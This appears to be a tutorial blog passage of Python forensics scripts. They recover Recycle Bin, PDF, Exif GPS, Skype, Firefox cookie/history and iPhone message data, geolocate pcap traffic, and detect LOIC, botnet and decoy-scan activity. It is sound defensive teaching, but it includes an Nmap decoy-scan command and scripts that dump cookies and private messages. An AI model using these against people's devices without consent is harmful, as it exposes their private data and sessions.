def returnDir():
dirs=['C:\\Recycler\\', 'C:\\Recycled\\', 'C:\\$Recycle.Bin\\']
for recycleDir in dirs:
if os.path.isdir(recycleDir):
return recycleDir
return None
# query the registry to map the directory's SID to a username
def sid2user(sid):
try:
key = OpenKey(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList" + '\\' + sid)
(value, type) = QueryValueEx(key, 'ProfileImagePath')
user = value.split('\\')[-1]
return user
except:
return sid
def findRecycled(recycleDir):
dirList = os.listdir(recycleDir)
for sid in dirList:
files = os.listdir(recycleDir + sid)
user = sid2user(sid)
print '\n[*] Listing Files For User: ' + str(user)
for file in files:
print '[+] Found File: ' + str(file)
def main():
recycledDir = returnDir()
findRecycled(recycledDir)
if __name__ == '__main__':
main()
Contents of the Recycle Bin:
Run result:
pyPdf is a third-party Python library for working with PDF documents; it comes preinstalled in Kali, so there is nothing extra to download.
#!/usr/bin/python
#coding=utf-8
import pyPdf
import optparse
from pyPdf import PdfFileReader
# extract all of the PDF document's metadata with getDocumentInfo()
def printMeta(fileName):
pdfFile = PdfFileReader(file(fileName, 'rb'))
docInfo = pdfFile.getDocumentInfo()
print "[*] PDF MetaData For: " + str(fileName)
for metaItem in docInfo:
print "[+] " + metaItem + ": " + docInfo[metaItem]
def main():
parser = optparse.OptionParser("[*]Usage: python pdfread.py -F <pdf file name>")
parser.add_option('-F', dest='fileName', type='string', help='specify PDF file name')
(options, args) = parser.parse_args()
fileName = options.fileName
if fileName == None:
print parser.usage
exit(0)
else:
printMeta(fileName)
if __name__ == '__main__':
main()
Result of parsing a PDF file:
Exif (exchangeable image file format) defines the standard for storing metadata inside image and audio files.
import urllib2
from bs4 import BeautifulSoup as BS
from os.path import basename
from urlparse import urlsplit
# find every img tag at the URL with BeautifulSoup
def findImages(url):
print '[+] Finding images on ' + url
urlContent = urllib2.urlopen(url).read()
soup = BS(urlContent, 'lxml')
imgTags = soup.findAll('img')
return imgTags
# download each image via the URL in its src attribute
def downloadImage(imgTag):
try:
print '[+] Dowloading image...'
imgSrc = imgTag['src']
imgContent = urllib2.urlopen(imgSrc).read()
imgFileName = basename(urlsplit(imgSrc)[2])
imgFile = open(imgFileName, 'wb')
imgFile.write(imgContent)
imgFile.close()
return imgFileName
except:
return ' '
This uses the Python imaging library PIL, which is preinstalled in Kali.
The script checks whether a downloaded image's metadata contains the Exif tag "GPSInfo" and reports any image where it is present.
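Once a GPSInfo tag is found, its coordinates are stored as degree/minute/second rationals that still need converting to decimal degrees. A sketch of that conversion (the ((d,1),(m,1),(s*100,100)) layout follows the Exif convention; the sample values are made up):

```python
def dms_to_decimal(dms, ref):
    """Convert Exif-style ((deg,1),(min,1),(sec,den)) rationals plus an
    N/S/E/W reference letter into signed decimal degrees."""
    deg = dms[0][0] / float(dms[0][1])
    minutes = dms[1][0] / float(dms[1][1])
    seconds = dms[2][0] / float(dms[2][1])
    value = deg + minutes / 60.0 + seconds / 3600.0
    # south latitudes and west longitudes are negative
    return -value if ref in ('S', 'W') else value

print(dms_to_decimal(((40, 1), (41, 1), (2120, 100)), 'N'))
```

The decimal result is what mapping sites such as Google Earth expect.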
#!/usr/bin/python
#coding=utf-8
import optparse
from PIL import Image
from PIL.ExifTags import TAGS
import urllib2
from bs4 import BeautifulSoup as BS
from os.path import basename
from urlparse import urlsplit
# find every img tag at the URL with BeautifulSoup
def findImages(url):
print '[+] Finding images on ' + url
urlContent = urllib2.urlopen(url).read()
soup = BS(urlContent, 'lxml')
imgTags = soup.findAll('img')
return imgTags
# download each image via the URL in its src attribute
def downloadImage(imgTag):
try:
print '[+] Dowloading image...'
imgSrc = imgTag['src']
imgContent = urllib2.urlopen(imgSrc).read()
imgFileName = basename(urlsplit(imgSrc)[2])
imgFile = open(imgFileName, 'wb')
imgFile.write(imgContent)
imgFile.close()
return imgFileName
except:
return ' '
# read the image's metadata and look for the Exif tag "GPSInfo"
def testForExif(imgFileName):
try:
exifData = {}
imgFile = Image.open(imgFileName)
info = imgFile._getexif()
if info:
for (tag, value) in info.items():
decoded = TAGS.get(tag, tag)
exifData[decoded] = value
exifGPS = exifData['GPSInfo']
if exifGPS:
print '[*] ' + imgFileName + ' contains GPS MetaData'
except:
pass
def main():
parser = optparse.OptionParser('[*]Usage: python Exif.py -u <target url>')
parser.add_option('-u', dest='url', type='string', help='specify url address')
(options, args) = parser.parse_args()
url = options.url
if url == None:
print parser.usage
exit(0)
else:
imgTags = findImages(url)
for imgTag in imgTags:
imgFileName = downloadImage(imgTag)
testForExif(imgFileName)
if __name__ == '__main__':
main()
The sample page from the book is https://www.flickr.com/photos/dvids/4999001925/sizes/o
Run result:
The Skype client is not installed here; test this yourself if you are interested.
#!/usr/bin/python
#coding=utf-8
import sqlite3
import optparse
import os
# connect to the main.db database, get a cursor, run the SQL query, and print the results
def printProfile(skypeDB):
conn = sqlite3.connect(skypeDB)
c = conn.cursor()
c.execute("SELECT fullname, skypename, city, country, datetime(profile_timestamp,'unixepoch') FROM Accounts;")
for row in c:
print '[*] -- Found Account --'
print '[+] User : '+str(row[0])
print '[+] Skype Username : '+str(row[1])
print '[+] Location : '+str(row[2])+','+str(row[3])
print '[+] Profile Date : '+str(row[4])
# fetch contact information
def printContacts(skypeDB):
conn = sqlite3.connect(skypeDB)
c = conn.cursor()
c.execute("SELECT displayname, skypename, city, country, phone_mobile, birthday FROM Contacts;")
for row in c:
print '\n[*] -- Found Contact --'
print '[+] User : ' + str(row[0])
print '[+] Skype Username : ' + str(row[1])
if str(row[2]) != '' and str(row[2]) != 'None':
print '[+] Location : ' + str(row[2]) + ',' + str(row[3])
if str(row[4]) != 'None':
print '[+] Mobile Number : ' + str(row[4])
if str(row[5]) != 'None':
print '[+] Birthday : ' + str(row[5])
def printCallLog(skypeDB):
conn = sqlite3.connect(skypeDB)
c = conn.cursor()
c.execute("SELECT datetime(begin_timestamp,'unixepoch'), identity FROM calls, conversations WHERE calls.conv_dbid = conversations.id;")
print '\n[*] -- Found Calls --'
for row in c:
print '[+] Time: ' + str(row[0]) + ' | Partner: ' + str(row[1])
def printMessages(skypeDB):
conn = sqlite3.connect(skypeDB)
c = conn.cursor()
c.execute("SELECT datetime(timestamp,'unixepoch'), dialog_partner, author, body_xml FROM Messages;")
print '\n[*] -- Found Messages --'
for row in c:
try:
if 'partlist' not in str(row[3]):
if str(row[1]) != str(row[2]):
msgDirection = 'To ' + str(row[1]) + ': '
else:
msgDirection = 'From ' + str(row[2]) + ' : '
print 'Time: ' + str(row[0]) + ' ' + msgDirection + str(row[3])
except:
pass
def main():
parser = optparse.OptionParser("[*]Usage: python skype.py -p <skype profile path>")
parser.add_option('-p', dest='pathName', type='string', help='specify skype profile path')
(options, args) = parser.parse_args()
pathName = options.pathName
if pathName == None:
print parser.usage
exit(0)
elif os.path.isdir(pathName) == False:
print '[!] Path Does Not Exist: ' + pathName
exit(0)
else:
skypeDB = os.path.join(pathName, 'main.db')
if os.path.isfile(skypeDB):
printProfile(skypeDB)
printContacts(skypeDB)
printCallLog(skypeDB)
printMessages(skypeDB)
else:
print '[!] Skype Database ' + 'does not exist: ' + skypeDB
if __name__ == '__main__':
main()
Here the testing is done directly against the data the book's author provides:
On Windows 7 and later, Firefox's sqlite files live in a directory like C:\Users\win7\AppData\Roaming\Mozilla\Firefox\Profiles\8eogekr4.default
The files of interest are cookies.sqlite, places.sqlite, and downloads.sqlite.
Recent Firefox versions, however, no longer ship downloads.sqlite; finding which file replaced it is left as a quick exercise.
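The places.sqlite queries below can be exercised against an in-memory database with the same join structure. A sketch (the schema is an assumption, reduced to the columns the queries actually use):

```python
import sqlite3

# Minimal stand-in for places.sqlite, reduced to the columns used below
conn = sqlite3.connect(':memory:')
c = conn.cursor()
c.execute('CREATE TABLE moz_places (id INTEGER, url TEXT, visit_count INTEGER)')
c.execute('CREATE TABLE moz_historyvisits (place_id INTEGER, visit_date INTEGER)')
# visit_date is stored in microseconds since the epoch, hence the /1000000
c.execute("INSERT INTO moz_places VALUES (1, 'http://www.baidu.com/s?wd=python&rsv=1', 3)")
c.execute('INSERT INTO moz_historyvisits VALUES (1, 1325376000000000)')
c.execute("SELECT url, datetime(visit_date/1000000, 'unixepoch') "
          'FROM moz_places, moz_historyvisits '
          'WHERE visit_count > 0 AND moz_places.id == moz_historyvisits.place_id;')
rows = c.fetchall()
print(rows)
```

The division by 1000000 converts Firefox's microsecond timestamps to the seconds that SQLite's datetime() expects.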
#!/usr/bin/python
#coding=utf-8
import re
import optparse
import os
import sqlite3
# parse downloads.sqlite and print the browser's download history
def printDownloads(downloadDB):
conn = sqlite3.connect(downloadDB)
c = conn.cursor()
c.execute('SELECT name, source, datetime(endTime/1000000, \'unixepoch\') FROM moz_downloads;')
print '\n[*] --- Files Downloaded --- '
for row in c:
print '[+] File: ' + str(row[0]) + ' from source: ' + str(row[1]) + ' at: ' + str(row[2])
# parse cookies.sqlite and print the stored cookies
def printCookies(cookiesDB):
try:
conn = sqlite3.connect(cookiesDB)
c = conn.cursor()
c.execute('SELECT host, name, value FROM moz_cookies')
print '\n[*] -- Found Cookies --'
for row in c:
host = str(row[0])
name = str(row[1])
value = str(row[2])
print '[+] Host: ' + host + ', Cookie: ' + name + ', Value: ' + value
except Exception, e:
if 'encrypted' in str(e):
print '\n[*] Error reading your cookies database.'
print '[*] Upgrade your Python-Sqlite3 Library'
# parse places.sqlite and print the browsing history
def printHistory(placesDB):
try:
conn = sqlite3.connect(placesDB)
c = conn.cursor()
c.execute("select url, datetime(visit_date/1000000, 'unixepoch') from moz_places, moz_historyvisits where visit_count > 0 and moz_places.id==moz_historyvisits.place_id;")
print '\n[*] -- Found History --'
for row in c:
url = str(row[0])
date = str(row[1])
print '[+] ' + date + ' - Visited: ' + url
except Exception, e:
if 'encrypted' in str(e):
print '\n[*] Error reading your places database.'
print '[*] Upgrade your Python-Sqlite3 Library'
exit(0)
# parse places.sqlite and print the Baidu search history
def printBaidu(placesDB):
conn = sqlite3.connect(placesDB)
c = conn.cursor()
c.execute("select url, datetime(visit_date/1000000, 'unixepoch') from moz_places, moz_historyvisits where visit_count > 0 and moz_places.id==moz_historyvisits.place_id;")
print '\n[*] -- Found Baidu --'
for row in c:
url = str(row[0])
date = str(row[1])
if 'baidu' in url.lower():
r = re.findall(r'wd=.*?\&', url)
if r:
search=r[0].split('&')[0]
search=search.replace('wd=', '').replace('+', ' ')
print '[+] '+date+' - Searched For: ' + search
def main():
parser = optparse.OptionParser("[*]Usage: firefoxParse.py -p <firefox profile path>")
parser.add_option('-p', dest='pathName', type='string', help='specify firefox profile path')
(options, args) = parser.parse_args()
pathName = options.pathName
if pathName == None:
print parser.usage
exit(0)
elif os.path.isdir(pathName) == False:
print '[!] Path Does Not Exist: ' + pathName
exit(0)
else:
downloadDB = os.path.join(pathName, 'downloads.sqlite')
if os.path.isfile(downloadDB):
printDownloads(downloadDB)
else:
print '[!] Downloads Db does not exist: '+downloadDB
cookiesDB = os.path.join(pathName, 'cookies.sqlite')
if os.path.isfile(cookiesDB):
printCookies(cookiesDB)
else:
print '[!] Cookies Db does not exist:' + cookiesDB
placesDB = os.path.join(pathName, 'places.sqlite')
if os.path.isfile(placesDB):
printHistory(placesDB)
printBaidu(placesDB)
else:
print '[!] PlacesDb does not exist: ' + placesDB
if __name__ == '__main__':
main()
The script above makes one small change to the original: the lookup for Google searches is replaced with a lookup for Baidu searches, which is more common domestically~
Run result:
Apart from downloads.sqlite not being found, every file parses normally. In the search results, Chinese and other non-ASCII terms appear in encoded form.
No iPhone here :-) — if you have one, test it yourself.
#!/usr/bin/python
#coding=utf-8
import os
import sqlite3
import optparse
def isMessageTable(iphoneDB):
try:
conn = sqlite3.connect(iphoneDB)
c = conn.cursor()
c.execute('SELECT tbl_name FROM sqlite_master WHERE type==\"table\";')
for row in c:
if 'message' in str(row):
return True
except:
return False
def printMessage(msgDB):
try:
conn = sqlite3.connect(msgDB)
c = conn.cursor()
c.execute('select datetime(date,\'unixepoch\'), address, text from message WHERE address>0;')
for row in c:
date = str(row[0])
addr = str(row[1])
text = row[2]
print '\n[+] Date: '+date+', Addr: '+addr + ' Message: ' + text
except:
pass
def main():
parser = optparse.OptionParser("[*]Usage: python iphoneParse.py -p <iPhone backup directory>")
parser.add_option('-p', dest='pathName', type='string',help='specify iPhone backup directory')
(options, args) = parser.parse_args()
pathName = options.pathName
if pathName == None:
print parser.usage
exit(0)
else:
dirList = os.listdir(pathName)
for fileName in dirList:
iphoneDB = os.path.join(pathName, fileName)
if isMessageTable(iphoneDB):
try:
print '\n[*] --- Found Messages ---'
printMessage(iphoneDB)
except:
pass
if __name__ == '__main__':
main()
pygeoip must be installed, either with pip install pygeoip or from GitHub: https://github.com/appliedsec/pygeoip
You also need the GeoLiteCity database that pygeoip reads; download and extract it to obtain the GeoLiteCity.dat file:
http://dev.maxmind.com/geoip/legacy/geolite/
Put GeoLiteCity.dat in the same directory as the script and reference it directly.
#!/usr/bin/python
#coding=utf-8
import pygeoip
# look up the city record in the database and print it
def printRecord(tgt):
rec = gi.record_by_name(tgt)
city = rec['city']
# the original code was region = rec['region_name']; 'region_name' is deprecated
region = rec['region_code']
country = rec['country_name']
long = rec['longitude']
lat = rec['latitude']
print '[*] Target: ' + tgt + ' Geo-located. '
print '[+] '+str(city)+', '+str(region)+', '+str(country)
print '[+] Latitude: '+str(lat)+ ', Longitude: '+ str(long)
gi = pygeoip.GeoIP('GeoLiteCity.dat')
tgt = '173.255.226.98'
printRecord(tgt)
Run result:
Install the dpkt package: pip install dpkt
dpkt lets you walk through a capture file packet by packet and inspect every protocol layer inside each packet.
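dpkt hands back ip.src and ip.dst as packed 4-byte values, and socket.inet_ntoa is what turns them into the dotted-quad strings printed below. A minimal check without needing a pcap:

```python
import socket

# dpkt exposes ip.src / ip.dst as packed 4-byte values;
# inet_ntoa renders such a value as a dotted-quad string
packed = b'\xc0\xa8\x01\x0a'
print(socket.inet_ntoa(packed))
```

Passing anything other than exactly four bytes raises an error, which is one reason the parsing loop below wraps each packet in try/except.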
#!/usr/bin/python
#coding=utf-8
import dpkt
import socket
def printPcap(pcap):
# iterate over the (timestamp, packet) records
for (ts, buf) in pcap:
try:
# parse the Ethernet frame
eth = dpkt.ethernet.Ethernet(buf)
# get the IP layer data
ip = eth.data
# convert the packed binary addresses into dotted-quad strings with inet_ntoa
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
print '[+] Src: ' + src + ' --> Dst: ' + dst
except:
pass
def main():
f = open('geotest.pcap')
pcap = dpkt.pcap.Reader(f)
printPcap(pcap)
if __name__ == '__main__':
main()
Since not much traffic was captured locally, the test just uses the book's pcap:
Next, add a retGeoStr() function that returns the physical location of a given IP address, simply extracting the city and the three-letter country code and printing them. The combined code:
#!/usr/bin/python
#coding=utf-8
import dpkt
import socket
import pygeoip
import optparse
gi = pygeoip.GeoIP('GeoLiteCity.dat')
# look up the city record in the database and print it
def printRecord(tgt):
rec = gi.record_by_name(tgt)
city = rec['city']
# the original code was region = rec['region_name']; 'region_name' is deprecated
region = rec['region_code']
country = rec['country_name']
long = rec['longitude']
lat = rec['latitude']
print '[*] Target: ' + tgt + ' Geo-located. '
print '[+] '+str(city)+', '+str(region)+', '+str(country)
print '[+] Latitude: '+str(lat)+ ', Longitude: '+ str(long)
def printPcap(pcap):
# iterate over the (timestamp, packet) records
for (ts, buf) in pcap:
try:
# parse the Ethernet frame
eth = dpkt.ethernet.Ethernet(buf)
# get the IP layer data
ip = eth.data
# convert the packed binary addresses into dotted-quad strings with inet_ntoa
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
print '[+] Src: ' + src + ' --> Dst: ' + dst
print '[+] Src: ' + retGeoStr(src) + '--> Dst: ' + retGeoStr(dst)
except:
pass
# return the physical location of the given IP address
def retGeoStr(ip):
try:
rec = gi.record_by_name(ip)
city = rec['city']
country = rec['country_code3']
if city != '':
geoLoc = city + ', ' + country
else:
geoLoc = country
return geoLoc
except Exception, e:
return 'Unregistered'
def main():
parser = optparse.OptionParser('[*]Usage: python geoPrint.py -p <pcap file>')
parser.add_option('-p', dest='pcapFile', type='string', help='specify pcap filename')
(options, args) = parser.parse_args()
if options.pcapFile == None:
print parser.usage
exit(0)
pcapFile = options.pcapFile
f = open(pcapFile)
pcap = dpkt.pcap.Reader(f)
printPcap(pcap)
if __name__ == '__main__':
main()
Still using the earlier test pcap:
Here the code is modified to write the KML output into a new file rather than printing it to the console.
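The Placemark string that retKML assembles can be sketched and checked in isolation (element layout per the KML spec; the name and coordinates below are sample values):

```python
def make_placemark(name, longitude, latitude):
    """Build a minimal KML Placemark; KML puts longitude before latitude."""
    return ('<Placemark>\n'
            '<name>%s</name>\n'
            '<Point>\n'
            '<coordinates>%6f,%6f</coordinates>\n'
            '</Point>\n'
            '</Placemark>\n') % (name, longitude, latitude)

km = make_placemark('93.184.216.34', -97.822, 37.751)
print(km)
```

The longitude-first ordering trips people up often; Google Earth silently plots swapped coordinates in the wrong place.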
#!/usr/bin/python
#coding=utf-8
import dpkt
import socket
import pygeoip
import optparse
gi = pygeoip.GeoIP('GeoLiteCity.dat')
# build a KML Placemark from the IP address's longitude and latitude
def retKML(ip):
rec = gi.record_by_name(ip)
try:
longitude = rec['longitude']
latitude = rec['latitude']
kml = (
'<Placemark>\n'
'<name>%s</name>\n'
'<Point>\n'
'<coordinates>%6f,%6f</coordinates>\n'
'</Point>\n'
'</Placemark>\n'
) %(ip,longitude, latitude)
return kml
except:
return ' '
def plotIPs(pcap):
kmlPts = ''
for (ts, buf) in pcap:
try:
eth = dpkt.ethernet.Ethernet(buf)
ip = eth.data
src = socket.inet_ntoa(ip.src)
srcKML = retKML(src)
dst = socket.inet_ntoa(ip.dst)
dstKML = retKML(dst)
kmlPts = kmlPts + srcKML + dstKML
except:
pass
return kmlPts
def main():
parser = optparse.OptionParser('[*]Usage: python googleearthPrint.py -p <pcap file>')
parser.add_option('-p', dest='pcapFile', type='string', help='specify pcap filename')
(options, args) = parser.parse_args()
if options.pcapFile == None:
print parser.usage
exit(0)
pcapFile = options.pcapFile
f = open(pcapFile)
pcap = dpkt.pcap.Reader(f)
kmlheader = '<?xml version="1.0" encoding="UTF-8"?>'\
'\n<kml xmlns="http://www.opengis.net/kml/2.2">\n<Document>\n'
kmlfooter = '</Document>\n</kml>\n'
kmldoc = kmlheader + plotIPs(pcap) + kmlfooter
# print kmldoc
with open('googleearthPrint.kml', 'w') as f:
f.write(kmldoc)
print "[+]Created googleearthPrint.kml successfully"
if __name__ == '__main__':
main()
Run result:
Viewing the kml file:
Next, open Google Earth: https://www.google.com/earth/
Import the kml file from the options on the left:
Once imported, click any IP to see its location plotted on the map:
LOIC, the Low Orbit Ion Cannon, is a stress-testing tool that attackers commonly abuse for DDoS attacks.
A fairly reliable LOIC download source: https://sourceforge.net/projects/loic/
Because the download site has moved from HTTP to HTTPS, the request headers can no longer be analyzed by simply capturing the traffic.
#!/usr/bin/python
#coding=utf-8
import dpkt
import socket
def findDownload(pcap):
for (ts, buf) in pcap:
try:
eth = dpkt.ethernet.Ethernet(buf)
ip = eth.data
src = socket.inet_ntoa(ip.src)
# get the TCP segment
tcp = ip.data
# parse the HTTP request carried in the TCP payload
http = dpkt.http.Request(tcp.data)
# a GET request whose URI contains ".zip" and "loic" indicates a LOIC download
if http.method == 'GET':
uri = http.uri.lower()
if '.zip' in uri and 'loic' in uri:
print "[!] " + src + " Downloaded LOIC."
except:
pass
f = open('download.pcap')
pcap = dpkt.pcap.Reader(f)
findDownload(pcap)
Here the test uses the pcap the book provides:
The following code detects IRC commands in botnet traffic:
#!/usr/bin/python
#coding=utf-8
import dpkt
import socket
def findHivemind(pcap):
for (ts, buf) in pcap:
try:
eth = dpkt.ethernet.Ethernet(buf)
ip = eth.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
tcp = ip.data
dport = tcp.dport
sport = tcp.sport
# destination port 6667 carrying a "!lazor" command means a member issued an attack order
if dport == 6667:
if '!lazor' in tcp.data.lower():
print '[!] DDoS Hivemind issued by: '+src
print '[+] Target CMD: ' + tcp.data
# source port 6667 carrying a "!lazor" command means the server is broadcasting the attack to hive members
if sport == 6667:
if '!lazor' in tcp.data.lower():
print '[!] DDoS Hivemind issued to: '+src
print '[+] Target CMD: ' + tcp.data
except:
pass
f = open('hivemind.pcap')
pcap = dpkt.pcap.Reader(f)
findHivemind(pcap)
Again tested directly with the sample pcap:
Detection here works by setting a threshold on the number of anomalous packets and flagging a DDoS attack when it is exceeded.
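The per-stream counting the script performs reduces to a dictionary tally keyed on "src:dst". A sketch with synthetic traffic (the addresses and the low threshold are made up for the example):

```python
from collections import Counter

THRESH = 3  # low threshold just for this synthetic sample

# synthetic (src, dst) pairs standing in for parsed port-80 packets
packets = [('10.0.0.5', '192.168.1.2')] * 5 + [('10.0.0.9', '192.168.1.2')]
pktCount = Counter('%s:%s' % (src, dst) for src, dst in packets)

# any stream over the threshold is flagged as an attack
attackers = [stream for stream, n in pktCount.items() if n > THRESH]
print(attackers)
```

Counter does the increment-or-initialize bookkeeping that the original handles with has_key().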
#!/usr/bin/python
#coding=utf-8
import dpkt
import socket
# default threshold for the number of anomalous packets: 1000
THRESH = 1000
def findAttack(pcap):
pktCount = {}
for (ts, buf) in pcap:
try:
eth = dpkt.ethernet.Ethernet(buf)
ip = eth.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
tcp = ip.data
dport = tcp.dport
# tally how many times each src address hits port 80 on each dst
if dport == 80:
stream = src + ':' + dst
if pktCount.has_key(stream):
pktCount[stream] = pktCount[stream] + 1
else:
pktCount[stream] = 1
except:
pass
for stream in pktCount:
pktsSent = pktCount[stream]
# 若超过设置检测的阈值,则判断为进行DDoS攻击
if pktsSent > THRESH:
src = stream.split(':')[0]
dst = stream.split(':')[1]
print '[+] ' + src + ' attacked ' + dst + ' with ' + str(pktsSent) + ' pkts.'
f = open('attack.pcap', 'rb')
pcap = dpkt.pcap.Reader(f)
findAttack(pcap)
同样直接用案例的数据包来测试:
然后将前面的代码整合到一起:
#!/usr/bin/python
#coding=utf-8
import dpkt
import socket
import optparse
# 默认设置检测不正常数据包的数量的阈值为1000
THRESH = 1000
def findDownload(pcap):
for (ts, buf) in pcap:
try:
eth = dpkt.ethernet.Ethernet(buf)
ip = eth.data
src = socket.inet_ntoa(ip.src)
# 获取TCP数据
tcp = ip.data
# 解析TCP中的上层协议HTTP的请求
http = dpkt.http.Request(tcp.data)
# 若是GET方法,且请求行中包含“.zip”和“loic”字样则判断为下载LOIC
if http.method == 'GET':
uri = http.uri.lower()
if '.zip' in uri and 'loic' in uri:
print "[!] " + src + " Downloaded LOIC."
except:
pass
def findHivemind(pcap):
for (ts, buf) in pcap:
try:
eth = dpkt.ethernet.Ethernet(buf)
ip = eth.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
tcp = ip.data
dport = tcp.dport
sport = tcp.sport
# 若目标端口为6667且含有“!lazor”指令,则确定是某个成员提交一个攻击指令
if dport == 6667:
if '!lazor' in tcp.data.lower():
print '[!] DDoS Hivemind issued by: '+src
print '[+] Target CMD: ' + tcp.data
# 若源端口为6667且含有“!lazor”指令,则确定是服务器在向HIVE中的成员发布攻击的消息
if sport == 6667:
if '!lazor' in tcp.data.lower():
print '[!] DDoS Hivemind issued to: '+src
print '[+] Target CMD: ' + tcp.data
except:
pass
def findAttack(pcap):
pktCount = {}
for (ts, buf) in pcap:
try:
eth = dpkt.ethernet.Ethernet(buf)
ip = eth.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
tcp = ip.data
dport = tcp.dport
# 累计各个src地址对目标地址80端口访问的次数
if dport == 80:
stream = src + ':' + dst
if pktCount.has_key(stream):
pktCount[stream] = pktCount[stream] + 1
else:
pktCount[stream] = 1
except:
pass
for stream in pktCount:
pktsSent = pktCount[stream]
# 若超过设置检测的阈值,则判断为进行DDoS攻击
if pktsSent > THRESH:
src = stream.split(':')[0]
dst = stream.split(':')[1]
print '[+] ' + src + ' attacked ' + dst + ' with ' + str(pktsSent) + ' pkts.'
def main():
parser = optparse.OptionParser("[*]Usage: python findDDoS.py -p <pcapFile> -t <thresh>")
parser.add_option('-p', dest='pcapFile', type='string', help='specify pcap filename')
parser.add_option('-t', dest='thresh', type='int', help='specify threshold count ')
(options, args) = parser.parse_args()
if options.pcapFile == None:
print parser.usage
exit(0)
# THRESH为全局变量,需先声明global再赋值才能生效
global THRESH
if options.thresh != None:
THRESH = options.thresh
pcapFile = options.pcapFile
# dpkt.pcap.Reader只能完整遍历一次,原先连续调用三个函数的写法只有第一个能读到数据,注释掉另行修改
# f = open(pcapFile)
# pcap = dpkt.pcap.Reader(f)
# findDownload(pcap)
# findHivemind(pcap)
# findAttack(pcap)
with open(pcapFile, 'rb') as f:
pcap = dpkt.pcap.Reader(f)
findDownload(pcap)
with open(pcapFile, 'rb') as f:
pcap = dpkt.pcap.Reader(f)
findHivemind(pcap)
with open(pcapFile, 'rb') as f:
pcap = dpkt.pcap.Reader(f)
findAttack(pcap)
if __name__ == '__main__':
main()
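上面之所以每次检测都重新打开文件,是因为 dpkt.pcap.Reader 是一次性迭代器,遍历完即耗尽,连续传给三个函数时只有第一个能读到数据。下面用一个普通迭代器演示这种"只能消费一次"的行为(纯演示,不依赖dpkt):

```python
# 模拟 dpkt.pcap.Reader 这类一次性迭代器的行为
def fake_pcap_reader():
    return iter([(1.0, b'pkt1'), (2.0, b'pkt2'), (3.0, b'pkt3')])

reader = fake_pcap_reader()
first_pass = list(reader)    # 第一次遍历拿到全部数据包
second_pass = list(reader)   # 迭代器已耗尽,得到空列表

print(len(first_pass))   # 3
print(second_pass)       # []

# 另一种解决办法:先缓存到列表,之后就可以反复遍历
packets = list(fake_pcap_reader())
print(len(packets))      # 3
```

如果不想重复打开文件,也可以像最后两行那样先把所有(ts, buf)读入列表,再分别传给三个检测函数。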
由于这部分作者没有给示例数据包,那就自己来合并上述几个pcap文件,使用命令:
mergecap -a -F pcap -w traffic.pcap download.pcap hivemind.pcap attack.pcap
-a参数指定按照命令顺序来合并各个pcap文件(不添加-a参数则默认按照时间的顺序合并),-F参数指定生成的文件类型,-w参数指定生成的pcap文件。
运行结果:
TTL即time-to-live,由8比特组成,可以用来确定在到达目的地之前数据包经过了几跳。当计算机发送一个IP数据包时会设置TTL字段为数据包在到达目的地之前所应经过的中继跳转的上限值,数据包每经过一个路由设备,TTL值就自减一,若减至0还未到目的地,路由器会丢弃该数据包以防止无限路由循环。
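常见操作系统的初始TTL一般为64(多数Linux)、128(Windows)或255(部分网络设备),据此可以从收到的TTL粗略估算数据包经过的跳数。下面是一个纯Python的估算小例子(初始TTL的取值属于经验假设):

```python
# 常见的初始TTL经验值
COMMON_INITIAL_TTLS = [64, 128, 255]

def estimate_hops(observed_ttl):
    # 取不小于观测TTL的最小常见初始值,两者之差即估算的跳数
    for initial in COMMON_INITIAL_TTLS:
        if observed_ttl <= initial:
            return initial - observed_ttl
    return None  # 超过255,不是合法的TTL

print(estimate_hops(57))    # 64 - 57 = 7 跳
print(estimate_hops(116))   # 128 - 116 = 12 跳
```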
Nmap进行伪装扫描时,伪造数据包的TTL值是没有经过计算的,因而可以利用TTL值来分析所有来自Nmap扫描的数据包,对于每个被记录为Nmap扫描的源地址,发送一个ICMP数据包来确定源地址与目标机器之间隔了几跳,从而来辨别真正的扫描源。
Nmap的-D参数实现伪造源地址扫描:nmap 192.168.220.128 -D 8.8.8.8
Wireshark抓包分析,加上过滤器的条件“ip.addr==8.8.8.8”,发现确实是有用伪造源地址进行扫描:
点击各个数据包查看TTL值:
可以看到,默认情况下Nmap扫描发出的数据包,其TTL值是随机的。
添加--ttl参数指定值为13之后,可以看到发送的数据包的TTL值都为13:
这里使用Scapy库来获取源地址IP及其TTL值。
#!/usr/bin/python
#coding=utf-8
from scapy.all import *
# 检查数据包的IP层,提取出源IP和TTL字段的值
def testTTL(pkt):
try:
if pkt.haslayer(IP):
ipsrc = pkt.getlayer(IP).src
ttl = str(pkt.ttl)
print "[+] Pkt Received From: " + ipsrc + " with TTL: " + ttl
except:
pass
def main():
sniff(prn=testTTL, store=0)
if __name__ == '__main__':
main()
运行脚本监听后,启动Nmap伪造源地址扫描即可看到如下结果:
接着添加checkTTL()函数,主要实现对比TTL值进行源地址真伪判断:
#!/usr/bin/python
#coding=utf-8
from scapy.all import *
import time
import optparse
# 为避免IPy库中的IP类与Scapy库中的IP类冲突,重命名为IPTEST类
from IPy import IP as IPTEST
ttlValues = {}
THRESH = 5
# 检查数据包的IP层,提取出源IP和TTL字段的值
def testTTL(pkt):
try:
if pkt.haslayer(IP):
ipsrc = pkt.getlayer(IP).src
ttl = str(pkt.ttl)
checkTTL(ipsrc, ttl)
except:
pass
def checkTTL(ipsrc, ttl):
# 判断是否是内网私有地址
if IPTEST(ipsrc).iptype() == 'PRIVATE':
return
# 判断是否出现过该源地址,若没有则构建一个发往源地址的ICMP包,并记录回应数据包中的TTL值
if not ttlValues.has_key(ipsrc):
pkt = sr1(IP(dst=ipsrc) / ICMP(), retry=0, timeout=1, verbose=0)
ttlValues[ipsrc] = pkt.ttl
# 若两个TTL值之差大于阈值,则认为是伪造的源地址
if abs(int(ttl) - int(ttlValues[ipsrc])) > THRESH:
print '\n[!] Detected Possible Spoofed Packet From: ' + ipsrc
print '[!] TTL: ' + ttl + ', Actual TTL: ' + str(ttlValues[ipsrc])
def main():
parser = optparse.OptionParser("[*]Usage: python spoofDetect.py -i <iface> -t <thresh>")
parser.add_option('-i', dest='iface', type='string', help='specify network interface')
